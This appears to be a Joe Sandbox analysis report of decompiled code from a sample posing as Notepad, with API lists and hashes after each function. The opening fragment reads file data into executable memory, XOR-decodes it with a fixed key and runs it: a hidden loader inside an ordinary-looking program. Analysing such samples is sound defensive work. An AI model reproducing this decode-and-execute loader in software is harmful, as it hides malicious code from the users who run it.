                                                  						_t78 = _t100 - ((0xaaaaaaab * _t100 >> 0x20 >> 3) + (0xaaaaaaab * _t100 >> 0x20 >> 3) * 2 << 2);
                                                  						_t100 = _t100 + 1;
                                                  						_t8 = _t78 + "248058040134"; // 0x30383432
                                                  						 *(_t81 + _t100 - 1) =  *(_t81 + _t100 - 1) ^  *_t8;
                                                  					} while (_t100 < _t93);
                                                  				}
                                                  				 *_t81();
                                                  				__imp__#17();
                                                  				 *0x10c2dac = RegisterWindowMessageW(L"commdlg_FindReplace");
                                                  				E010A66E0(0x10c3f20, 0, 0x11f4);
                                                  				_t94 = _a4;
                                                  				 *0x10c3f20 = _t94;
                                                  				_t85 = 0x30;
                                                  				_t47 =  &_v52;
                                                  				do {
                                                  					 *_t47 = 0;
                                                  					_t47 = _t47 + 1;
                                                  					_t85 = _t85 - 1;
                                                  				} while (_t85 != 0);
                                                  				_v52.cbSize = 0x30;
                                                  				_v52.lpfnWndProc = 0x10a2890;
                                                  				_v52.hInstance = _t94;
                                                  				_v52.hIcon = LoadIconW(_t94, 0x300);
                                                  				_t49 = GetSystemMetrics(0x32);
                                                  				_v52.hIconSm = LoadImageW( *0x10c3f20, 0x300, 1, GetSystemMetrics(0x31), _t49, 0x8000);
                                                  				_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                  				_v52.hbrBackground = 6;
                                                  				_v52.lpszMenuName = 0x201;
                                                  				_v52.lpszClassName = L"Notepad";
                                                  				_t54 = RegisterClassExW( &_v52);
                                                  				if(_t54 != 0) {
                                                  					__imp__MonitorFromRect(0x10c2d9c, 1);
                                                  					_v100.cbSize = 0x28;
                                                  					GetMonitorInfoW(_t54,  &_v100);
                                                  					__eflags =  *0x10c3f24;
                                                  					if( *0x10c3f24 == 0) {
                                                  						ExitProcess(1);
                                                  					}
                                                  					E010A1420();
                                                  					ShowWindow( *0x10c3f24, _a16);
                                                  					UpdateWindow( *0x10c3f24);
                                                  					DragAcceptFiles( *0x10c3f24, 1);
                                                  					GetCommandLineW();
                                                  					_v132 = LoadAcceleratorsW(_t94, 0x203);
                                                  					_t62 = GetMessageW( &_v128, 0, 0, 0);
                                                  					__eflags = _t62;
                                                  					if(_t62 != 0) {
                                                  						do {
                                                  							_t65 = IsDialogMessageW( *0x10c3f28,  &_v128);
                                                  							__eflags = _t65;
                                                  							if(_t65 == 0) {
                                                  								_t69 = TranslateAcceleratorW( *0x10c3f24, _v132,  &_v128);
                                                  								__eflags = _t69;
                                                  								if(_t69 == 0) {
                                                  									TranslateMessage( &_v128);
                                                  									DispatchMessageW( &_v128);
                                                  								}
                                                  							}
                                                  							_t67 = GetMessageW( &_v128, 0, 0, 0);
                                                  							__eflags = _t67;
                                                  						} while (_t67 != 0);
                                                  					}
                                                  					return _v128.wParam;
                                                  				} else {
                                                  					return 0;
                                                  				}
                                                  			}





























                                                  APIs
                                                    • Part of subcall function 010A3542: __fsopen.LIBCMT ref: 010A354D
                                                  • _fseek.LIBCMT ref: 010A28C0
                                                  • _fseek.LIBCMT ref: 010A28D8
                                                    • Part of subcall function 010A3C76: __lock_file.LIBCMT ref: 010A3CB7
                                                    • Part of subcall function 010A3C76: __fseek_nolock.LIBCMT ref: 010A3CC6
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,?,?,?,?,?,?,00000000), ref: 010A28EA
                                                  • __fread_nolock.LIBCMT ref: 010A28F7
                                                  • #17.COMCTL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A292A
                                                  • RegisterWindowMessageW.USER32(commdlg_FindReplace,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A2935
                                                  • _memset.LIBCMT ref: 010A294D
                                                  • LoadIconW.USER32 ref: 010A298A
                                                  • GetSystemMetrics.USER32 ref: 010A29A1
                                                  • GetSystemMetrics.USER32 ref: 010A29A6
                                                  • LoadImageW.USER32 ref: 010A29B6
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 010A29CA
                                                  • RegisterClassExW.USER32 ref: 010A29F7
                                                  • MonitorFromRect.USER32(010C2D9C,00000001), ref: 010A2A14
                                                  • GetMonitorInfoW.USER32 ref: 010A2A28
                                                  • ExitProcess.KERNEL32 ref: 010A2A39
                                                    • Part of subcall function 010A1420: GetWindowTextLengthW.USER32(0001FF42), ref: 010A1427
                                                    • Part of subcall function 010A1420: SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A143E
                                                  • ShowWindow.USER32(?,?,?,?,?,?,?,?), ref: 010A2A4D
                                                  • UpdateWindow.USER32 ref: 010A2A59
                                                  • DragAcceptFiles.SHELL32(00000001,?,?,?,?,?,?,?), ref: 010A2A67
                                                  • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 010A2A6D
                                                  • LoadAcceleratorsW.USER32 ref: 010A2A79
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2A94
                                                  • IsDialogMessageW.USER32(?), ref: 010A2ABB
                                                  • TranslateAcceleratorW.USER32(?,?), ref: 010A2AD4
                                                  • TranslateMessage.USER32(?), ref: 010A2AE3
                                                  • DispatchMessageW.USER32 ref: 010A2AEA
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2AF7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Message$LoadWindow$MetricsMonitorRegisterSystemTranslate_fseek$AcceleratorAcceleratorsAcceptAllocClassCommandCursorDialogDispatchDragExitFilesFromIconImageInfoLengthLineProcessRectSendShowTextUpdateVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_memset
                                                  • String ID: ($0$Notepad$commdlg_FindReplace
                                                  • API String ID: 1672473475-3416331526
                                                  • Opcode ID: f8d20d228c65e057ec61dd4220d35292c206ccab7122985762876c5affa35050
                                                  • Instruction ID: 371b7687be9af811e0789ca4951b30671ce9d30513af48d672cbe41d9ad7ca59
                                                  • Opcode Fuzzy Hash: f8d20d228c65e057ec61dd4220d35292c206ccab7122985762876c5affa35050
                                                  • Instruction Fuzzy Hash: 2251C472544301AFE720AFE4DD89FDB7BE8FB44B40F404429F6C59A194D7B69904CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E010A1CB0() {
                                                  				signed int _v8;
                                                  				int _v12;
                                                  				void* _v16;
                                                  				intOrPtr _v50;
                                                  				signed int _v52;
                                                  				intOrPtr _v56;
                                                  				signed int _v58;
                                                  				signed short _v60;
                                                  				signed int _v64;
                                                  				struct HDC__* _v68;
                                                  				intOrPtr _v72;
                                                  				intOrPtr _v76;
                                                  				intOrPtr _v80;
                                                  				struct tagPD _v84;
                                                  				void* _v88;
                                                  				long _v92;
                                                  				char* _v96;
                                                  				signed int _v100;
                                                  				void* _v104;
                                                  				struct _DOCINFOW _v124;
                                                  				intOrPtr _v128;
                                                  				intOrPtr _v132;
                                                  				intOrPtr _v136;
                                                  				char _v140;
                                                  				intOrPtr _v168;
                                                  				intOrPtr _v176;
                                                  				signed char _v196;
                                                  				signed int _v200;
                                                  				intOrPtr _v224;
                                                  				struct tagOFNA _v228;
                                                  				struct tagLOGFONTW _v320;
                                                  				char _v1320;
                                                  				signed int _t102;
                                                  				signed int _t112;
                                                  				int _t117;
                                                  				int _t120;
                                                  				int _t124;
                                                  				int _t127;
                                                  				int _t132;
                                                  				void* _t134;
                                                  				void* _t135;
                                                  				signed int _t141;
                                                  				signed int _t153;
                                                  				void* _t156;
                                                  				signed int _t162;
                                                  				signed int _t166;
                                                  				int _t173;
                                                  				int _t176;
                                                  				int _t185;
                                                  				void* _t187;
                                                  				void* _t188;
                                                  
                                                  				E010A66E0( &_v84, 0, 0x42);
                                                  				_v80 =  *0x10c3f24;
                                                  				_v76 =  *0x10c510c;
                                                  				_v72 =  *0x10c5110;
                                                  				_v50 =  *0x10c3f20;
                                                  				_t188 = _t187 + 0xc;
                                                  				_v60 = 0;
                                                  				_v52 = 0;
                                                  				_v84 = 0x42;
                                                  				_v64 = 0x104;
                                                  				_v56 = 0xffff0001;
                                                  				_t102 = PrintDlgW( &_v84);
                                                  				if(_t102 == 0) {
                                                  					L19:
                                                  					return _t102;
                                                  				} else {
                                                  					 *0x10c510c = _v76;
                                                  					 *0x10c5110 = _v72;
                                                  					SetMapMode(_v68, 1);
                                                  					_v124.cbSize = 0x14;
                                                  					_v124.lpszDocName = 0x10c45b8;
                                                  					_v124.lpszOutput = 0;
                                                  					_v124.lpszDatatype = 0;
                                                  					_v124.fwType = 0;
                                                  					if((_v64 & 0x00000020) == 0) {
                                                  						L3:
                                                  						_t33 = GetWindowTextLengthW( *0x10c3f2c) + 1; // 0x1
                                                  						_t176 = _t33;
                                                  						_t156 = HeapAlloc(GetProcessHeap(), 0, _t176 + _t176);
                                                  						_v16 = _t156;
                                                  						if(_t156 != 0) {
                                                  							_v8 = GetWindowTextW( *0x10c3f2c, _t156, _t176);
                                                  							_t112 = StartDocW(_v68,  &_v124);
                                                  							__eflags = _t112;
                                                  							if(_t112 <= 0) {
                                                  								L18:
                                                  								DeleteDC(_v68);
                                                  								return HeapFree(GetProcessHeap(), 0, _t156);
                                                  							}
                                                  							_t117 = MulDiv( *0x10c4c90, GetDeviceCaps(_v68, 0x5a), 0x9ec);
                                                  							_v136 = _t117 - GetDeviceCaps(_v68, 0x71);
                                                  							_t120 = MulDiv( *0x10c4c94, GetDeviceCaps(_v68, 0x5a), 0x9ec);
                                                  							_v128 = GetDeviceCaps(_v68, 0x6f) - _t120;
                                                  							_t124 = MulDiv( *0x10c4c98, GetDeviceCaps(_v68, 0x58), 0x9ec);
                                                  							_v140 = _t124 - GetDeviceCaps(_v68, 0x70);
                                                  							_t127 = MulDiv( *0x10c4c9c, GetDeviceCaps(_v68, 0x58), 0x9ec);
                                                  							_v132 = GetDeviceCaps(_v68, 0x6e) - _t127;
                                                  							memcpy( &_v320, 0x10c3f40, 0x17 << 2);
                                                  							_t132 = MulDiv(_v320.lfHeight, GetDeviceCaps(_v68, 0x5a), _v12);
                                                  							_v320.lfWeight = _v320.lfWeight - 0x64;
                                                  							_v320 = _t132;
                                                  							_t134 = CreateFontIndirectW( &_v320);
                                                  							_v12 = _t134;
                                                  							_t135 = SelectObject(_v68, _t134);
                                                  							_t156 = _v16;
                                                  							_t173 = 1;
                                                  							_v88 = _t135;
                                                  							__eflags = 1 - _v52;
                                                  							if(1 > _v52) {
                                                  								L17:
                                                  								EndDoc(_v68);
                                                  								SelectObject(_v68, _v88);
                                                  								DeleteObject(_v12);
                                                  								goto L18;
                                                  							}
                                                  							_t166 = 0;
                                                  							__eflags = 0;
                                                  							_t141 = _t156 + _v8 * 2;
                                                  							_v8 = _t141;
                                                  							do {
                                                  								_v100 = _t141;
                                                  								_t185 = 1;
                                                  								_v104 = _t156;
                                                  								_v96 =  &_v1320;
                                                  								_v92 = 0;
                                                  								do {
                                                  									__eflags = _v64 & 0x00000002;
                                                  									if(__eflags == 0) {
                                                  										_t162 = 1;
                                                  										L13:
                                                  										_t166 = E010A1980(_v68,  &_v140, __eflags, _t162, _t185,  &_v104);
                                                  										_t185 = _t185 + 1;
                                                  										__eflags = _t166;
                                                  										if(_t166 == 0) {
                                                  											goto L17;
                                                  										}
                                                  										goto L14;
                                                  									}
                                                  									__eflags = _t185 - (_v58 & 0x0000ffff);
                                                  									if(_t185 > (_v58 & 0x0000ffff)) {
                                                  										break;
                                                  									}
                                                  									__eflags = _t185 - (_v60 & 0x0000ffff);
                                                  									_t162 = 0 | __eflags >= 0x00000000;
                                                  									goto L13;
                                                  									L14:
                                                  									__eflags = _v104 - _v100;
                                                  								} while (_v104 < _v100);
                                                  								__eflags = _t166;
                                                  								if(_t166 == 0) {
                                                  									goto L17;
                                                  								}
                                                  								_t173 = _t173 + 1;
                                                  								__eflags = _t173 - (_v52 & 0x0000ffff);
                                                  								_t141 = _v8;
                                                  							} while (_t173 <= (_v52 & 0x0000ffff));
                                                  							goto L17;
                                                  						}
                                                  						return DeleteDC(_v68);
                                                  					} else {
                                                  						E010A66E0( &_v228, 0, 0x58);
                                                  						_t188 = _t188 + 0xc;
                                                  						_v224 = _v80;
                                                  						_v228 = 0x58;
                                                  						_v176 = 0x806;
                                                  						_v200 = L"output.prn";
                                                  						_v196 = 0x104;
                                                  						_v168 = L"prn";
                                                  						_t153 = GetSaveFileNameW( &_v228);
                                                  						asm("sbb eax, eax");
                                                  						_t102 =  ~_t153 & L"output.prn";
                                                  						_v124.lpszOutput = _t102;
                                                  						if(_t102 == 0) {
                                                  							goto L19;
                                                  						} else {
                                                  							goto L3;
                                                  						}
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • _memset.LIBCMT ref: 010A1CC1
                                                  • PrintDlgW.COMDLG32(?), ref: 010A1D0B
                                                  • SetMapMode.GDI32(?,00000001), ref: 010A1D2E
                                                  • _memset.LIBCMT ref: 010A1D68
                                                  • GetSaveFileNameW.COMDLG32(?), ref: 010A1DB2
                                                  • GetWindowTextLengthW.USER32 ref: 010A1DD2
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A1DE1
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A1DE8
                                                  • DeleteDC.GDI32(?), ref: 010A1DFA
                                                  • GetWindowTextW.USER32 ref: 010A1E0E
                                                  • StartDocW.GDI32(?,00000014), ref: 010A1E1E
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1E3D
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E4C
                                                  • GetDeviceCaps.GDI32(?,00000071), ref: 010A1E55
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1E69
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E72
                                                  • GetDeviceCaps.GDI32(?,0000006F), ref: 010A1E7B
                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 010A1E8C
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E95
                                                  • GetDeviceCaps.GDI32(?,00000070), ref: 010A1E9E
                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 010A1EB2
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1EBB
                                                  • GetDeviceCaps.GDI32(?,0000006E), ref: 010A1EC4
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1EE5
                                                  • MulDiv.KERNEL32(?,00000000), ref: 010A1EF2
                                                  • CreateFontIndirectW.GDI32(?), ref: 010A1F08
                                                  • SelectObject.GDI32(?,00000000), ref: 010A1F15
                                                  • EndDoc.GDI32(?), ref: 010A1FB6
                                                  • SelectObject.GDI32(?,?), ref: 010A1FC2
                                                  • DeleteObject.GDI32(?), ref: 010A1FCB
                                                  • DeleteDC.GDI32(?), ref: 010A1FD5
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A1FDE
                                                  • HeapFree.KERNEL32(00000000), ref: 010A1FE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Heap$DeleteObject$ProcessSelectTextWindow_memset$AllocCreateFileFontFreeIndirectLengthModeNamePrintSaveStart
                                                  • String ID: $B$X$d$prn
                                                  • API String ID: 1012857974-182643923
                                                  • Opcode ID: 76a1c6afb9bd5251449a4714e256d19bcde66cf97625c41d9c3722fe9463210a
                                                  • Instruction ID: 421f3cfadb9668999931931a061ff8df3cb428f61af2f64e0476b321be325b46
                                                  • Opcode Fuzzy Hash: 76a1c6afb9bd5251449a4714e256d19bcde66cf97625c41d9c3722fe9463210a
                                                  • Instruction Fuzzy Hash: E0A10571D00258EFEB209FE4DD88BDEBBB9FB48304F004065EA85AB294DB7A5945CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E010A1140(WCHAR* __ecx, int __edx) {
                                                  				long _v8;
                                                  				long _v12;
                                                  				int _v16;
                                                  				short _v28;
                                                  				int _t26;
                                                  				long _t27;
                                                  				int _t33;
                                                  				void* _t36;
                                                  				signed int _t37;
                                                  				int _t56;
                                                  				long _t60;
                                                  				void _t66;
                                                  				int _t68;
                                                  				int _t73;
                                                  				void* _t74;
                                                  				int _t77;
                                                  				short _t78;
                                                  				WCHAR* _t84;
                                                  				void* _t85;
                                                  				int _t87;
                                                  				int _t88;
                                                  				void* _t89;
                                                  				void* _t92;
                                                  				void* _t93;
                                                  
                                                  				_t73 = __edx;
                                                  				_t84 = __ecx;
                                                  				_t88 = GetWindowTextLengthW( *0x10c3f2c);
                                                  				if(SendMessageW( *0x10c3f2c, 0xb8, 0, 0) == 0) {
                                                  					L9:
                                                  					_t26 = CreateFileW(_t84, 0x80000000, 3, 0, 3, 0x80, 0);
                                                  					_t85 = _t26;
                                                  					if(_t85 == 0xffffffff) {
                                                  						goto L43;
                                                  					} else {
                                                  						_t27 = GetFileSize(_t85, 0);
                                                  						_v8 = _t27;
                                                  						if(_t27 != 0xffffffff) {
                                                  							_t89 = HeapAlloc(GetProcessHeap(), 0, _t27 + 2);
                                                  							if(_t89 == 0) {
                                                  								goto L11;
                                                  							} else {
                                                  								_t33 = ReadFile(_t85, _t89, _v8,  &_v12, 0);
                                                  								_push(_t85);
                                                  								if(_t33 != 0) {
                                                  									CloseHandle();
                                                  									_t77 = _v12;
                                                  									_v8 = _t77;
                                                  									if(_t73 != 0xffffffff) {
                                                  										if(_t77 >= 2 && (_t73 == 1 || _t73 == 2)) {
                                                  											_t66 =  *_t89;
                                                  											if(_t66 != 0xff ||  *((char*)(_t89 + 1)) != 0xfe) {
                                                  												if(_t66 == 0xfe) {
                                                  													_t73 =  ==  ? 2 : _t73;
                                                  												}
                                                  											} else {
                                                  												_t73 = 1;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_t68 = E010A10E0(_t89, _t77);
                                                  										_t77 = _v8;
                                                  										_t73 = _t68;
                                                  									}
                                                  									_t36 = _t73 - 1;
                                                  									if(_t36 == 0 || _t36 == 1) {
                                                  										_t74 = _t89;
                                                  										_t87 = _t77 >> 1;
                                                  										goto L31;
                                                  									} else {
                                                  										_t56 =  ==  ? 0xfde9 : 0;
                                                  										_v16 = _t56;
                                                  										_t87 = MultiByteToWideChar(_t56, 0, _t89, _t77, 0, 0);
                                                  										_t60 = HeapAlloc(GetProcessHeap(), 0, 2 + _t87 * 2);
                                                  										_t74 = _t60;
                                                  										if(_t74 != 0) {
                                                  											MultiByteToWideChar(_v16, 0, _t89, _v8, _t74, _t87);
                                                  											HeapFree(GetProcessHeap(), 0, _t89);
                                                  											L31:
                                                  											_t37 = 0;
                                                  											if(_t87 > 0) {
                                                  												_t14 = _t37 + 0x20; // 0x20
                                                  												_t78 = _t14;
                                                  												do {
                                                  													if( *((short*)(_t74 + _t37 * 2)) == 0) {
                                                  														 *((short*)(_t74 + _t37 * 2)) = _t78;
                                                  													}
                                                  													_t37 = _t37 + 1;
                                                  												} while (_t37 < _t87);
                                                  											}
                                                  											 *((short*)(_t74 + _t87 * 2)) = 0;
                                                  											if(_t87 < 1 ||  *_t74 != 0xfeff) {
                                                  												_push(_t74);
                                                  											} else {
                                                  												_t21 = _t74 + 2; // 0x2
                                                  											}
                                                  											SetWindowTextW( *0x10c3f2c, ??);
                                                  											HeapFree(GetProcessHeap(), 0, _t74);
                                                  											SendMessageW( *0x10c3f2c, 0xb9, 0, 0);
                                                  											SendMessageW( *0x10c3f2c, 0xcd, 0, 0);
                                                  											SetFocus( *0x10c3f2c);
                                                  											_t26 = GetWindowTextW( *0x10c3f2c,  &_v28, 0);
                                                  											if(_t26 != 0) {
                                                  												_t26 = lstrcmpW( &_v28, L".LOG");
                                                  												if(_t26 == 0) {
                                                  													SendMessageW( *0x10c3f2c, 0xb1, GetWindowTextLengthW( *0x10c3f2c), 0xffffffff);
                                                  													SendMessageW( *0x10c3f2c, 0xc2, 1, L"\r\n");
                                                  													E010A2150();
                                                  													return SendMessageW( *0x10c3f2c, 0xc2, 1, L"\r\n");
                                                  												}
                                                  											}
                                                  											goto L43;
                                                  										} else {
                                                  											return HeapFree(GetProcessHeap(), _t60, _t89);
                                                  										}
                                                  									}
                                                  								} else {
                                                  									CloseHandle();
                                                  									return HeapFree(GetProcessHeap(), 0, _t89);
                                                  								}
                                                  							}
                                                  						} else {
                                                  							L11:
                                                  							return CloseHandle(_t85);
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t26 =  *0x10c43b0;
                                                  					if(_t88 != 0 || _t26 != 0) {
                                                  						_t92 = _t88 - 2;
                                                  						if(_t92 == 0) {
                                                  							L43:
                                                  							return _t26;
                                                  						} else {
                                                  							_t93 = _t92 - 4;
                                                  							if(_t93 == 0) {
                                                  								if(_t26 != 0) {
                                                  									goto L9;
                                                  								} else {
                                                  									_t26 = E010A1770();
                                                  									if(_t26 == 0) {
                                                  										goto L43;
                                                  									} else {
                                                  										goto L9;
                                                  									}
                                                  								}
                                                  							} else {
                                                  								if(_t93 == 1) {
                                                  									goto L9;
                                                  								} else {
                                                  									return _t26;
                                                  								}
                                                  							}
                                                  						}
                                                  					} else {
                                                  						goto L9;
                                                  					}
                                                  				}
                                                  			}




























                                                  APIs
                                                  • GetWindowTextLengthW.USER32 ref: 010A1153
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A116A
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11C0
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11D4
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11E3
                                                  • GetProcessHeap.KERNEL32(00000000,-00000002,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11F6
                                                  • HeapAlloc.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11FD
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1214
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A121F
                                                  • HeapFree.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1230
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A123D
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12B1
                                                  • HeapAlloc.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12CB
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12D9
                                                  • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12E0
                                                    • Part of subcall function 010A1770: _memset.LIBCMT ref: 010A1781
                                                    • Part of subcall function 010A1770: lstrcpyW.KERNEL32 ref: 010A1795
                                                    • Part of subcall function 010A1770: GetSaveFileNameW.COMDLG32(?), ref: 010A17FD
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12F8
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1307
                                                  • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A130A
                                                  • SetWindowTextW.USER32(00000000), ref: 010A1359
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1362
                                                  • HeapFree.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1365
                                                  • SendMessageW.USER32(000000B9,00000000,00000000), ref: 010A1380
                                                  • SendMessageW.USER32(000000CD,00000000,00000000), ref: 010A1391
                                                  • SetFocus.USER32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1399
                                                  • GetWindowTextW.USER32 ref: 010A13AB
                                                  • lstrcmpW.KERNEL32(?,.LOG,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A13BE
                                                  • GetWindowTextLengthW.USER32(000000FF), ref: 010A13D0
                                                  • SendMessageW.USER32(000000B1,00000000,?,80000000), ref: 010A13E2
                                                  • SendMessageW.USER32(000000C2,00000001,010BEE24), ref: 010A13F6
                                                  • SendMessageW.USER32(000000C2,00000001,010BEE24), ref: 010A140F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Heap$MessageSend$FileFreeProcessTextWindow$CloseHandle$AllocByteCharLengthMultiWide$CreateFocusNameReadSaveSize_memsetlstrcmplstrcpy
                                                  • String ID: .LOG
                                                  • API String ID: 597183282-2272326732
                                                  • Opcode ID: 9e0341d5d14a1de73616a7d6ef55f6286cb74d53c09b4e71e600cb12abdac55c
                                                  • Instruction ID: f1d4bd0fd3d428322d88ab0b2ab9a28689df52f255d06a9da6523ac5bdf679e1
                                                  • Opcode Fuzzy Hash: 9e0341d5d14a1de73616a7d6ef55f6286cb74d53c09b4e71e600cb12abdac55c
                                                  • Instruction Fuzzy Hash: 2F81E832640205BBFB315BF8ADC9FEA3B79EB45750F508961FAC5EA1C4CB7688018B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E010A1980(struct HDC__* __ecx, int* __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, int _a12) {
                                                  				struct HDC__* _v8;
                                                  				struct tagSIZE _v16;
                                                  				int* _v20;
                                                  				struct tagSIZE _v28;
                                                  				struct tagTEXTMETRICW _v88;
                                                  				signed int _t93;
                                                  				int _t96;
                                                  				int _t104;
                                                  				int _t106;
                                                  				WCHAR* _t120;
                                                  				int _t121;
                                                  				signed int _t128;
                                                  				int _t131;
                                                  				int _t142;
                                                  				struct HDC__* _t153;
                                                  				signed int _t154;
                                                  				int _t156;
                                                  				struct HDC__* _t157;
                                                  				short _t162;
                                                  				signed int _t163;
                                                  				WCHAR* _t164;
                                                  				WCHAR* _t168;
                                                  				int _t169;
                                                  				int _t170;
                                                  				void* _t171;
                                                  				RECT* _t172;
                                                  				intOrPtr _t174;
                                                  				int _t175;
                                                  				void* _t178;
                                                  				int* _t179;
                                                  				void* _t180;
                                                  				void* _t184;
                                                  
                                                  				_t172 = __edx;
                                                  				_t168 = _a8;
                                                  				_t153 = __ecx;
                                                  				_v20 = __edx;
                                                  				_v8 = __ecx;
                                                  				_t178 = E010A1890(0x10c4ea8, _t168);
                                                  				_a8 = _t178;
                                                  				if(_t178 == 0) {
                                                  					L4:
                                                  					return 0;
                                                  				} else {
                                                  					if(_a4 == 0 || StartPage(__ecx) > 0) {
                                                  						GetTextMetricsW(_t153,  &_v88);
                                                  						_t92 = lstrlenW;
                                                  						if( *0x10c43b0 == 0) {
                                                  							_t154 = 0;
                                                  						} else {
                                                  							GetTextExtentPoint32W(_t153, 0x10c43b0, lstrlenW(0x10c43b0),  &_v16);
                                                  							if(_a4 != 0) {
                                                  								_t142 = lstrlenW(0x10c43b0);
                                                  								asm("cdq");
                                                  								ExtTextOutW(_t153, _t172->right - _v16.cx + _t172->left - _t168 >> 1, _t172->top, 4, _t172, 0x10c43b0, _t142, 0);
                                                  								_t178 = _a8;
                                                  							}
                                                  							_t92 = lstrlenW;
                                                  							_t154 = 1;
                                                  						}
                                                  						_t156 = _t154 * _v88.tmHeight + _t172->top;
                                                  						if( *_t178 == 0) {
                                                  							_t93 = 0;
                                                  						} else {
                                                  							GetTextExtentPoint32W(_v8, _t178,  *_t92( &_v16), _t178);
                                                  							_t93 = 1;
